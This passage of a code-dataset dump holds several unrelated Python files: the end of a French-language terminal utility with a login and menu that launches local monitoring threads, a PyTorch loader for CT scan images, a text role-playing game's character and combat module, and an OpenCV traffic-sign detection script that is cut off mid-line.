variable:\n print(variable.read()+\"\\n\")\n\n except IOError:\n\n print(f\"Is Violet deployed : NO \\n\")\n\n print(\"|(1) Outils # (2) Réseau # (3) Internet |\\n|(4) Stockage # (5) Serveur # (6) Configuration | \\n|(7) Créateur # (8) LoopSequence # (9) Deploy Violet |\\n\")\n self.chooseAction()\n\n def login(self):\n from Library import toHash\n print(\"--------------- Tobias Login Page : ---------------\\n\")\n username = input(\" Nom d'utilisateur : \")\n password = getpass.getpass(\" Mot de passe : \")\n if username == self.getModuleData(\"prenom\"):\n if toHash.HASH(password) == self.getModuleData(\"password\"):\n self.start()\n else :\n print(\"WRONG PASSWORD\")\n sys.exit(0)\n\n def creator(self):\n self.choiceList()\n\n def chooseAction(self):\n choice = input(\"----> Votre choix : \")\n if choice == \"1\":\n\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Outil ----\\n\")\n print(\"----- Bloc Note (1) | Handler (2) | Raw (3) -----\\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.blocNote()\n self.retour()\n\n if answer == \"2\":\n self.handler()\n self.retour()\n\n if answer == \"3\":\n self.raw()\n self.retour()\n\n\n if choice == \"2\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Réseau ----\\n\")\n print(\"----- Page Reseau (1) | Paquet (2) \\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.pageReseau()\n self.retour()\n\n if answer == \"2\":\n self.paquet()\n self.retour()\n\n\n if choice == \"4\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Stockage ----\\n\")\n print(\"----- Coffre Fort (1) | GetFromDb (2) | Archiver\\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.coffreFort()\n self.retour()\n\n if answer == \"2\":\n self.getFromDb()\n self.retour()\n\n if answer == \"3\":\n self.Archives()\n self.retour()\n\n\n if choice == \"5\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Serveur ----\\n\")\n print(\"----- Page Serveur (1) | Transférer \\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.pageServeur()\n self.retour()\n\n if answer == \"2\":\n self.transfert()\n self.retour()\n\n\n if choice == \"7\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Créateur ----\\n\")\n self.creator()\n # self.start()\n\n\n elif choice == \"8\" :\n threadLoopSequence = threading.Thread(target=self.loopSequence())\n threadLoopSequence.start()\n self.retour()\n\n elif choice == \"9\" :\n threadViolet = threading.Thread(target=self.initializeViolet())\n threadViolet.start()\n self.retour()\n\n def pageServeur(self):\n pass\n\n def transfert(self):\n pass\n\n def coffreFort(self):\n pass\n\n def getFromDb(self):\n pass\n\n def Archives(self):\n pass\n\n def pageReseau(self):\n pass\n\n def paquet(self):\n pass\n\n def blocNote(self):\n self.notesPath = self.getPaths('noteFile','Notes')\n\n with open(f\"{self.notesPath}\",\"r\") as variable :\n print(variable.read())\n\n def raw(self):\n pass\n\n def handler(self):\n pass\n\n def loopSequence(self):\n\n import time\n from multiprocessing import Process\n\n from Library.NBook import Network\n from Library.RawNetwork import Ally_Computers, internetProtocol\n from Security.Backbone import Backbone\n from Security.Riot import Security\n\n\n \"\"\" Execute every methods in order to make them properly available to the user \"\"\"\n\n print(\"Launching loopSequence\")\n\n\n #BackBone\n if self.getModuleData(\"ipScan\",\"Backbone\") == \"True\" :\n loopBackboneIpScan = threading.Thread(target=Backbone().innerPortScan())\n loopBackboneIpScan.start()\n\n\n if self.getModuleData(\"networkSpace\",\"Backbone\") == \"True\" :\n loopBackboneNetworkSpace = threading.Thread(target=Backbone().networkSpace())\n loopBackboneNetworkSpace.start()\n\n if self.getModuleData(\"allow/Deny access\",\"Backbone\") == \"True\" :\n loopBackbone = threading.Thread(target=Backbone().Etapes_de_Fonctionnement())\n loopBackbone.start()\n\n # Riot\n if self.getModuleData(\"authorized_keys\",\"Riot\") == \"True\" :\n loopRiot = threading.Thread(target=Security().autorized_keysCheck())\n loopRiot.start()\n\n # if self.getModuleData(\"crontabCheck\",\"Riot\") == \"True\" :\n # print(\"starting\")\n # loopCrontab = threading.Thread(target=Security().crontabCheck())\n # loopCrontab.start()\n\n if self.getModuleData(\"connexions\",\"Riot\") == \"True\" :\n loopRiot = threading.Thread(target=Security().connexion())\n loopRiot.start()\n\n if self.getModuleData(\"processus\",\"Riot\") == \"True\" :\n loopRiotProc = threading.Thread(target=Security().Processus())\n loopRiotProc.start()\n\n #RawNetwork\n # if self.getModuleData(\"AllyComputer\",\"General\") == \"True\" :\n # self.threads(Ally_Computers().Main())\n\n if self.getModuleData(\"Internet Protocol\",\"General\") == \"True\" :\n loopRaw = threading.Thread(target=internetProtocol().Main())\n loopRaw.start()\n\n def getModuleData(self,searchingFor,fieldName='user'):\n import json\n with open(f\"{self.confs}\",\"r\") as config :\n content = json.load(config)\n\n for parameters in content['Configurations'] :\n for keys,values in parameters[fieldName].items() :\n if searchingFor == keys :\n return values\n\n def getPaths(self,searchingFor,fieldName='Archives'):\n\n with open(f\"Settings/Paths/filesPaths.json\",\"r\") as variable:\n content = json.load(variable)\n\n for parameters in content['Paths'] :\n for keys,values in parameters[fieldName].items() :\n if searchingFor == keys :\n return values\n\n#Tobias Main Task\nif __name__ == \"__main__\":\n Tobias()\n # creatorDebug = Creator()\n\n\n\n\n","sub_path":"Terminal/Tobias.py","file_name":"Tobias.py","file_ext":"py","file_size_in_byte":30935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367247496","text":"import os\n\nimport torch\nfrom torch.utils.data import Dataset as dataset\nimport SimpleITK as sitk\nimport numpy as np\n\n\nclass Dataset(dataset):\n def __init__(self, CT_dir, GT_dir):\n\n self.CT_list = list(map(lambda x: os.path.join(CT_dir, x), os.listdir(CT_dir)))\n self.GT_list = list(map(lambda x: os.path.join(GT_dir, x), os.listdir(GT_dir)))\n\n\n def __getitem__(self, index):\n\n CT_path = self.CT_list[index]\n GT_path = self.GT_list[index]\n\n # 将CT和金标准读入到内存中\n CT = sitk.ReadImage(CT_path)\n GT = sitk.ReadImage(GT_path)\n\n CT_nd = sitk.GetArrayFromImage(CT)\n GT_nd = sitk.GetArrayFromImage(GT)\n\n if len(CT_nd.shape) == 2:\n CT_nd = np.expand_dims(CT_nd, axis=2)\n GT_nd=np.expand_dims(GT_nd,axis=2)\n # HWC to CHW\n CT = CT_nd.transpose((2, 0, 1))\n GT=GT_nd.transpose((2,0,1))\n\n # 处理完毕,将array转换为tensor\n CT_array = torch.from_numpy(CT).float()\n GT_array = torch.from_numpy(GT).float().squeeze(0)\n\n return CT_array, GT_array\n\n def __len__(self):\n\n return len(self.CT_list)\n\nCT_dir = \"/share/xianqim/UNet/data/img_process_600\"\nGT_dir = \"/share/xianqim/UNet/data/label_600\"\n\nData2d = Dataset(CT_dir, GT_dir)\n\n\n","sub_path":"dataloaders/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284921269","text":"import random, sys\r\n\r\ndef roll():\r\n return random.randint(1, 20)\r\n\r\nclass character:\r\n def __init__(self,name,age,home,intel,char,agil,stre,luck,type, life, batt):\r\n self.name = name\r\n self.age = age\r\n self.home = home\r\n self.intel = intel\r\n self.char = char\r\n self.agil = agil\r\n self.stre = stre\r\n self.luck = luck\r\n self.type = type\r\n self.life = life\r\n self.batt = batt\r\n\r\ndef translate(word):\r\n lordex = 0\r\n lord = \"\"\r\n for letter in word:\r\n if random.randint(1,5) > 3:\r\n if letter.lower() in \"aiu\":\r\n letter = \"o\"\r\n lord += letter\r\n elif letter.lower() in \"eoy\":\r\n letter = \"i\"\r\n lord += letter\r\n elif letter.lower() in \"h\":\r\n letter = \"u\"\r\n lord += letter\r\n elif letter.lower() in \"spt\":\r\n letter = \"z\"\r\n lord += letter\r\n elif letter.lower() in \"mlt\":\r\n letter = \"n\"\r\n lord += letter\r\n elif letter.lower() in \"djz\":\r\n letter = \"ch\"\r\n lord += letter\r\n elif letter.lower() in \"nv\":\r\n letter = \"m\"\r\n lord += letter\r\n else:\r\n lord += letter\r\n # print(letter)\r\n return lord\r\n\r\ndef fight(good, bad):\r\n atk = good.stre+random.randint(-3,7)\r\n if atk < 0:\r\n atk = 0\r\n bad.life = bad.life - atk\r\n if bad.life < 1:\r\n print(\"\\nYou caused \" + str(atk) + \" damage...\\n\" + bad.name + \" has been destroyed.\\n\")\r\n return \"break\"\r\n else:\r\n print(\"\\nYour attack did \" + str(atk) + \" damage.\")\r\n print(bad.name + \" is still alive with \" + str(bad.life) +\r\n \" life points remaining.\")\r\n atk = bad.stre + random.randint(-3, 5)\r\n if atk < 0:\r\n atk = 0\r\n good.life = good.life - atk\r\n if good.life > 0:\r\n print(\"\\n\" + bad.name + \" attacked you and caused \" + str(atk) + \" damage...\\nYou have \" + str(good.life) + \" remaining.\\n\")\r\n else:\r\n print(\"\\n\" + bad.name + \" attacked you with \" + str(atk) + \" damage...\\nYou died.\\n\\n\")\r\n sys.exit()\r\n\r\ndef stats(npc):\r\n return (\"name: \" + npc.name + \"\\nhome town: \" + npc.home + \"\\nage: \" + str(npc.age) + \"\\ntype: \" + str(npc.type) +\r\n \"\\n\\nintelligence: \" + str(npc.intel) + \"\\ncharisma: \" + str(npc.char) +\r\n \"\\nagillity: \" + str(npc.agil) + \"\\nstrength: \" + str(npc.stre) +\r\n \"\\nLife points: \" + str(npc.life) + \"\\n\")\r\n\r\ndef action(hero,npc):\r\n choice = input(\"what do you want to do: \").lower()\r\n if \"fight\" in choice:\r\n hero.batt = True\r\n if fight(hero, npc) == \"break\":\r\n return \"break\"\r\n hero.batt = True\r\n elif \"leave\" in choice:\r\n if hero.batt == True:\r\n if roll() + hero.luck > npc.life:\r\n print(\"You've succesfully escaped.\")\r\n return \"break\"\r\n else:\r\n print(\"\\nYou can't do that now.\")\r\n atk = npc.stre + random.randint(-3, 5)\r\n if atk < 0:\r\n atk = 0\r\n hero.life = hero.life - atk\r\n if hero.life > 0:\r\n print(npc.name + \" attacked you and caused \" + str(atk) + \" damage...\\nYou have \" + str(\r\n hero.life) + \" remaining.\\n\")\r\n else:\r\n print(npc.name + \" attacked you with \" + str(atk) + \" damage...\\nYou died.\")\r\n return \"break\"\r\n sys.exit()\r\n else:\r\n print(\"You walk away\")\r\n return \"break\"\r\n elif \"stat\" in choice:\r\n print(stats(npc))\r\n elif \"talk\" in choice:\r\n if hero.batt == False:\r\n if hero.char >= npc.char:\r\n if npc.talked == False:\r\n talk_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_dialogue\", \"r\")\r\n speech = \"My name is, \" + npc.name.title() + \". \" + random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n npc.talked = True\r\n else:\r\n talk_list = open( \"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_dialogue\", \"r\")\r\n speech = random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n else:\r\n talk_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_bad_dialogue\", \"r\")\r\n speech = random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n else:\r\n print(\"It's too late for words!\")\r\n\r\ndef enemy():\r\n\r\n name_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/names\", \"r\")\r\n name = translate(random.choice(list(name_list))).lower().title()\r\n name_list.close()\r\n\r\n if random.randint(1,35) == 1:\r\n age = random.randint(3,200)\r\n elif random.randint(1,12) == 1:\r\n age = random.randint(6,105)\r\n else:\r\n age = random.randint(10,65)\r\n\r\n skillpts = 20\r\n try:\r\n if random.randint(0,15) < 6:\r\n intel = random.randint(0, 12)\r\n skillpts = skillpts - intel\r\n char = random.randint(0, 7)\r\n skillpts = skillpts - char\r\n agil = random.randint(0, 5)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n elif random.randint(0,15) > 9:\r\n intel = random.randint(0, 5)\r\n skillpts = skillpts - intel\r\n char = random.randint(0, 6)\r\n skillpts = skillpts - char\r\n agil = random.randint(0, 7)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n else:\r\n intel = random.randint(2, 6)\r\n skillpts = skillpts - intel\r\n char = random.randint(2, 6)\r\n skillpts = skillpts - char\r\n agil = random.randint(2, 6)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n except:\r\n intel = random.randint(3, 7)\r\n char = random.randint(2, 6)\r\n agil = random.randint(2, 7)\r\n stre = random.randint(2, 8)\r\n luck = random.randint(2, 8)\r\n type_try = random.randint(1, 7)\r\n if type_try == 1:\r\n type = \"wizard\"\r\n intel += 4\r\n luck += 2\r\n life = 20+stre+(luck%4)\r\n elif type_try == 2:\r\n type = \"thief\"\r\n agil += 3\r\n luck += 2\r\n life = 17+stre+(luck%4)\r\n elif type_try == 3:\r\n type = \"warrior\"\r\n stre += 2\r\n char += 2\r\n life = 23+stre+(luck%4)\r\n elif type_try == 4:\r\n type = \"orc\"\r\n stre += 5\r\n life = 25+stre+(luck%4)\r\n else:\r\n type = \"villager\"\r\n stre = stre%4\r\n life = 5+stre+(luck%4)\r\n\r\n\r\n town_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/towns\", \"r\")\r\n town = translate(random.choice(list(town_list))).lower().title()\r\n town_list.close()\r\n\r\n if age < 26:\r\n agil += 3\r\n elif age < 40:\r\n stre += 3\r\n elif age < 50:\r\n char += 3\r\n elif age < 70:\r\n intel += 3\r\n else:\r\n luck += 3\r\n talked = False\r\n new_bad = [name, age, town, intel, char, agil, stre, luck, type, life, talked]\r\n return new_bad","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":8045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370065284","text":"import cv2\nimport numpy as np\nimport copy\nimport math\n\n\ndef show_img(str, img):\n cv2.imshow(str, img)\n cv2.waitKey(0)\n\n\ndef line_angle(line):\n x1, y1 = line[0:2]\n x2, y2 = line[2:]\n\n if y1 - y2 == 0:\n return 0\n\n if x1 - x2 == 0:\n return 90\n\n angle = np.rad2deg(np.arctan2(y2 - y1, x2 - x1))\n\n # make it in multiplcation of 5\n angle = 5 * (int(angle / 5))\n return angle\n\n\ndef filter_angles(lines, angles):\n lines_filtered = [line for line in lines if line_angle(line) in angles]\n return lines_filtered\n\n\ndef mark_traffic_signs(image_in, signs_dict):\n img = image_in.copy()\n for sign_name, center in signs_dict.items():\n x, y = int(center[0]), int(center[1])\n text = \"(({},{}),'{}')\".format(x, y, sign_name)\n xs, ys = image_in.shape[0], image_in.shape[1]\n orgx = x + 50 if x + 50 + 200 < xs else x - 200\n orgy = y\n cv2.putText(img, text, (orgx, orgy), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0))\n cv2.putText(img, \"*\", (x - 8, y + 9), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n return img\n\n\ndef draw_tl_center(image_in, center, state):\n img = image_in.copy()\n x, y = int(center[0]), int(center[1])\n text = \"(({},{}),'{}')\".format(x, y, state)\n xs, ys = image_in.shape[0], image_in.shape[1]\n orgx = x + 50 if x + 50 + 200 < xs else x - 200\n orgy = y\n cv2.putText(img, text, (orgx, orgy), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0))\n cv2.putText(img, \"*\", (x - 8, y + 9), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n return img\n\n\ndef get_midpt(line):\n x1, y1 = line[0], line[1]\n x2, y2 = line[2], line[3]\n return [(x1 / 2) + (x2 / 2), (y1 / 2) + (y2 / 2)]\n\n\ndef get_length(line):\n x1, y1 = line[0], line[1]\n x2, y2 = line[2], line[3]\n length = math.sqrt(abs(x1 - x2) ** 2 + abs(y1 - y2) ** 2)\n return length\n\n\ndef get_centers(lines):\n m = 0\n l1m = None\n l2m = None\n for l1 in lines:\n for l2 in lines:\n if tuple(l1) == tuple(l2):\n continue\n l1c = get_midpt(l1)\n l2c = get_midpt(l2)\n distance = get_length([l1c[0], l1c[1], l2c[0], l2c[1]])\n if m < distance:\n m = distance\n l1m = l1\n l2m = l2\n l1c = get_midpt(l1m)\n l2c = get_midpt(l2m)\n center = get_midpt([l1c[0], l1c[1], l2c[0], l2c[1]])\n return center\n\n\ndef get_square_centers(lines):\n # filter lines with +45 and -45 angles\n side_45 = filter_angles(lines, [45])\n side__45 = filter_angles(lines, [-45])\n\n # list of set of square lines\n squares = []\n for line1 in side_45:\n l1c = get_midpt(line1)\n for line2 in side__45:\n l2c = get_midpt(line2)\n \"\"\"\n if both lines are almost same length and \n either their mid point x values or mid point y values are approximately the same\n then they belong to the same set of square\n \"\"\"\n if ((abs(get_length(line1) - get_length(line2)) < 3)\n and ((abs(l1c[0] - l2c[0]) < 3) or (abs(l1c[1] - l2c[1]) < 3))):\n placed = False\n l1 = tuple(line1)\n l2 = tuple(line2)\n if len(squares) != 0:\n for square in squares:\n if l1 in square or l2 in square:\n square.add(l1)\n square.add(l2)\n placed = True\n if not placed:\n square = set({l1, l2})\n squares.append(square)\n\n print(squares)\n # for square in squares:\n # for line in square:\n # #cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0, 0, 255), 2)\n # x, y = line[0],line[1]\n # cv2.putText(sign_draw, \"*\", (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n # thickness=2)\n x, y = (749.75, 349.75)\n cv2.putText(sign_draw, \"*\", (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n thickness=2)\n show_img(\"lines\", sign_draw)\n\n centers = []\n\n for square in squares:\n \"\"\"\n get lines of same angle, get their mid points and the midpoint of these midpoints\n from the two groups, find mid-mid point\n \"\"\"\n\n # lines = [np.array(line) for line in list(square)]\n # side45 = filter_angles(lines, [45])\n # side_45 = filter_angles(lines, [-45])\n #\n # c = np.array([get_centers(side45), get_centers(side_45)])\n #\n # center = np.mean(c, axis=1)\n # centers.append(center)\n return centers\n\n\ndef proximal_pts(p1, p2, threshold):\n if (abs(p1[0] - p2[0]) < threshold and abs(p1[1] - p2[1]) < threshold):\n return True\n else:\n return False\n\n\ndef get_diamonds(lines):\n l45 = filter_angles(lines, [45])\n l_45 = filter_angles(lines, [-45])\n\n diamonds = []\n\n for l1 in l45:\n common = []\n p1 = (l1[0], l1[1])\n p2 = (l1[2], l1[3])\n for l2 in l_45:\n p3 = (l2[0], l2[1])\n p4 = (l2[2], l2[3])\n for pin1 in [p1, p2]:\n for pin2 in [p3, p4]:\n # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n if proximal_pts(pin1, pin2, 10):\n common = [(pin1[0] + pin2[0]) / 2, (pin1[1] + pin2[1]) / 2]\n placed = False\n l1t = tuple(l1)\n l2t = tuple(l2)\n ct = tuple(common)\n for diamond in diamonds:\n if l1t in diamond[\"lines\"] or l2t in diamond[\"lines\"]:\n diamond[\"lines\"].add(l1t)\n diamond[\"lines\"].add(l2t)\n diamond[\"common\"].add(ct)\n placed = True\n if not placed:\n diamond = {\"lines\": set([l1t, l2t]), \"common\": set({ct})}\n diamonds.append(diamond)\n return diamonds\n\n\ndef draw_circles(circles, img):\n for i in circles[0, :]:\n center = (i[0], i[1])\n # circle center\n cv2.circle(img, center, 1, (0, 100, 100), 3)\n # circle outline\n radius = i[2]\n cv2.circle(img, center, radius, (255, 0, 255), 3)\n\n\ndef pt_in_circle(c, r, p):\n if (c[0] - r < p[0] < c[0] + r) and (c[1] - r < p[1] < c[1] + r):\n return True\n return False\n\n\ndef get_lines_in_circles(lines, circles):\n linesIn = []\n for circle in circles:\n c = (circle[0], circle[1])\n r = circle[2]\n for line in lines:\n p1 = (line[0], line[1])\n p2 = (line[2], line[3])\n if pt_in_circle(c, r, p1) and pt_in_circle(c, r, p2):\n placed = False\n for l_pair in linesIn:\n if tuple(circle) == l_pair[\"cir\"]:\n l_pair[\"l\"].add(tuple(line))\n placed = True\n if not placed:\n linesIn.append({\"cir\": tuple(circle), \"l\": set({tuple(line)})})\n return linesIn\n\n\nsign = cv2.imread(\"input_images\\\\scene_stp_1.png\")\n# sign = cv2.imread(\"input_images\\\\scene_wrng_1.png\")\n\n# sign = cv2.imread(\"input_images\\\\scene_all_signs.png\")\nsign = cv2.imread(\"input_images\\\\test_images\\\\stop_249_149_blank.png\")\nsign_draw = copy.deepcopy(sign)\n# show_img(\"sample tl\", tl)\n\n# gray_img = cv2.cvtColor(sign, cv2.COLOR_BGR2GRAY)\n# blured = cv2.GaussianBlur(gray_img, (5,5),2)\n# edges_blur = cv2.Canny(blured, 5, 10)\n# show_img(\"blurred edges\", edges_blur)\n\n# check how canny edge filter shows up)\nedges = cv2.Canny(sign_draw, 100, 200)\nshow_img(\"edges of tl\", edges)\n\nlines = cv2.HoughLinesP(edges, rho=1, theta=np.pi / 36, threshold=20, minLineLength=5, maxLineGap=5)\nlines = lines.reshape(lines.shape[0], lines.shape[2])\n\nlengths = [5 * int(get_length(line) / 5) for line in lines]\nprint(sorted(lengths))\n\nlines = np.array([lines[i] for i in range(len(lines)) if 25 <= lengths[i] <= 40])\nprint(len(lines))\n\ni = 0\nfor line in lines:\n if 40 >= 5 * int(get_length(line) / 5) >= 25 or lengths[i] == 995:\n i += 1\n cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0, 0, 0), 2)\nshow_img(\"\", sign_draw)\n\nlinesS = filter_angles(lines, [0, 90])\nlinesA = filter_angles(lines, [45, -45])\n\nlinesV = filter_angles(lines, [90])\nlinesH = filter_angles(lines, [0])\nlinesP = filter_angles(lines, [45])\nlinesN = filter_angles(lines, [-45])\n\nprint(linesS)\nprint(linesA)\n\noctagons = []\n\nfor l1 in linesS:\n p1 = (l1[0], l1[1])\n p2 = (l1[2], l1[3])\n for l2 in linesA:\n p3 = (l2[0], l2[1])\n p4 = (l2[2], l2[3])\n for pin1 in [p1, p2]:\n for pin2 in [p3, p4]:\n # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n if proximal_pts(pin1, pin2, 10):\n common = [int((pin1[0] + pin2[0]) / 2), int((pin1[1] + pin2[1]) / 2)]\n placed = False\n l1t = tuple(l1)\n l2t = tuple(l2)\n ct = tuple(common)\n l1end = p2 if pin1 == p1 else p1\n l2end = p4 if pin2 == p3 else p3\n for octagon in octagons:\n if l1t in octagon[\"lines\"] or l2t in octagon[\"lines\"]:\n octagon[\"lines\"].add(l1t)\n octagon[\"lines\"].add(l2t)\n octagon[\"common\"].add(ct)\n octagon[\"common\"].add(l1end)\n octagon[\"common\"].add(l2end)\n placed = True\n if not placed:\n octagon = {\"lines\": set([l1t, l2t]), \"common\": set({ct, l1end, l2end})}\n octagons.append(octagon)\n\nfo = {\"lines\": set(), \"common\": set()}\nfor o in octagons:\n if len(o[\"lines\"]) >= 3:\n fo[\"lines\"] = fo[\"lines\"].union(o[\"lines\"])\n fo[\"common\"] = fo[\"common\"].union(o[\"common\"])\nprint(len(fo[\"lines\"]))\n\npoints = list(fo[\"common\"])\npd = list([0 for i in range(len(fo[\"common\"]))])\n\nfor i in range(len(points)):\n distances = [proximal_pts(points[i], pt, 15) for pt in points]\n distances[i] = False\n cx = points[i][0]\n cy = points[i][1]\n cx = np.mean([points[i][0] for i in range(len(points)) if distances[i]])\n for j in range(i + 1, len(distances)):\n if pd[j] == 0 and distances[j]:\n pd[j] = 1\nprint(pd)\n\ncenterx = int(np.mean([points[i][0] for i in range(len(points)) if pd[i] == 0]))\ncentery = int(np.mean([points[i][1] for i in range(len(points)) if pd[i] == 0]))\n\narea = sign_draw[centery - 5:centery + 5, centerx - 5:centerx + 5]\nred = np.mean(area[:, :, 2])\ngreen = np.mean(area[:, :, 1])\nblue = np.mean(area[:, :, 0])\nif red > 200:\n print(\"finally!!\")\n\ncv2.putText(sign_draw, \"*\", (int(centerx), int(centery)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), thickness=2)\n\nprint(points)\nfor i in range(len(points)):\n if pd[i] == 0:\n cv2.putText(sign_draw, \"*\", (int(points[i][0]), int(points[i][1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0),\n thickness=2)\nshow_img(\"\", sign_draw)\n\n\"\"\"\nfor each point, calculate the distance with each point in the array \nremove the points from array which have distance with the point < 15\n\"\"\"\n\n# for o in octagons:\n# print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n# for point in o[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n# thickness=2)\n# show_img(\"\",sign_draw)\n\n# oct2 = copy.deepcopy(octagons)\n\n\n# final_octagons = []\n# inter = [set({}) for i in range(len(octagons))]\n#\n# for i in range(len(octagons)):\n# for j in range(i+1, len(octagons)):\n# if octagons[i][\"lines\"].intersection(octagons[j][\"lines\"]) != set():\n# inter[i].add(j)\n#\n# oc = copy.deepcopy(octagons)\n# print(oc)\n# for i in range(len(inter)-1, -1, -1):\n# new_set = octagons[i]\n# dependents = list(inter[i])\n# dependents.sort()\n# for j in range(len(dependents)-1,-1,-1):\n# if dependents[j] >= len(octagons):\n# continue\n# old = octagons[dependents[j]]\n# new_set[\"lines\"] = new_set[\"lines\"].union(old[\"lines\"])\n# new_set[\"common\"] = new_set[\"common\"].union(old[\"common\"])\n# octagons.pop(j)\n# octagons[i] = new_set\n# final_octagons.append(new_set)\n#\n#\n# for o in octagons:\n# print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n# for point in o[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n# thickness=2)\n# show_img(\"\",sign_draw)\n\n\n# for o1 in octagons:\n# for o2 in octagons:\n# if o1[\"lines\"].intersection(o2[\"lines\"]) != set():\n#\n\n# print(len(lines))\n#\n# i=0\n# for line in lines:\n# if 40 >= 5*int(get_length(line)/5) >= 25:\n# i+=1\n# cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0,0,0), 2)\n# show_img(\"\",sign_draw)\n\n\n\"\"\"\n# for line in lines:\n# cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0,0,0), 2)\n\nlinesS = filter_angles(lines, [0,90])\nlinesA = filter_angles(lines, [45, -45])\n\nlinesV = filter_angles(lines, [90])\nlinesH = filter_angles(lines, [0])\nlinesP = filter_angles(lines, [45])\nlinesN = filter_angles(lines, [-45])\n\n# print(linesV)\n# print(linesH)\n# print(linesP)\n# print(linesN)\n\noctagons = []\n\nfor lV in linesV:\n p1 = (lV[0], lV[1])\n p2 = (lV[2], lV[3])\n for lP in linesP:\n p3 = (lP[0], lP[1])\n p4 = (lP[2], lP[3])\n if abs(get_length(lV) - get_length(lP)) <10:\n for lH in linesH:\n p5 = (lH[0], lH[1])\n p6 = (lH[2], lH[3])\n if abs(get_length(lH) - get_length(lP)) < 10:\n for pin1 in [p1, p2]:\n for pin2 in [p3,p4]:\n for pin3 in [p5,p6]:\n cv2.line(sign_draw, pin1, pin2, (0,0,0), 2)\n cv2.line(sign_draw, pin2, pin3, (0, 0, 0), 2)\n show_img(\"\", sign_draw)\n if proximal_pts(pin1, pin2, 10) and abs(get_length(lV) - get_length(lP)) <10:\n print(\"I am V- P \")\n common = [int((pin1[0] + pin2[0]) / 2), int((pin1[1] + pin2[1]) / 2)]\n placed = False\n lVt = tuple(lV)\n lPt = tuple(lP)\n ct = tuple(common)\n for o in octagons:\n if lVt in o[\"lines\"] or lPt in o[\"lines\"]:\n o[\"lines\"].add(lVt)\n o[\"lines\"].add(lPt)\n o[\"common\"].add(ct)\n placed = True\n if not placed:\n o = {\"lines\":set({lVt, lPt}), \"common\":set({ct})}\n if proximal_pts(pin2, pin3, 10) and abs(get_length(lH) - get_length(lP)) <10:\n print(\"I am P - H\")\n common = [int((pin2[0] + pin3[0]) / 2), int((pin2[1] + pin3[1]) / 2)]\n placed = False\n lHt = tuple(lH)\n lPt = tuple(lP)\n ct = tuple(common)\n for o in octagons:\n if lHt in o[\"lines\"] or lPt in o[\"lines\"]:\n o[\"lines\"].add(lHt)\n o[\"lines\"].add(lPt)\n o[\"common\"].add(ct)\n placed = True\n if not placed:\n o = {\"lines\":set({lHt, lPt}), \"common\":set({ct})}\n octagons.append(o)\n\n #points of lH and lV will be the last ones.\n\n\"\"\"\n\n# for l1 in linesS:\n# p1 = (l1[0], l1[1])\n# p2 = (l1[2], l1[3])\n# for l2 in linesA:\n# p3 = (l2[0], l2[1])\n# p4 = (l2[2], l2[3])\n# for pin1 in [p1, p2]:\n# for pin2 in [p3, p4]:\n# # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n# if proximal_pts(pin1, 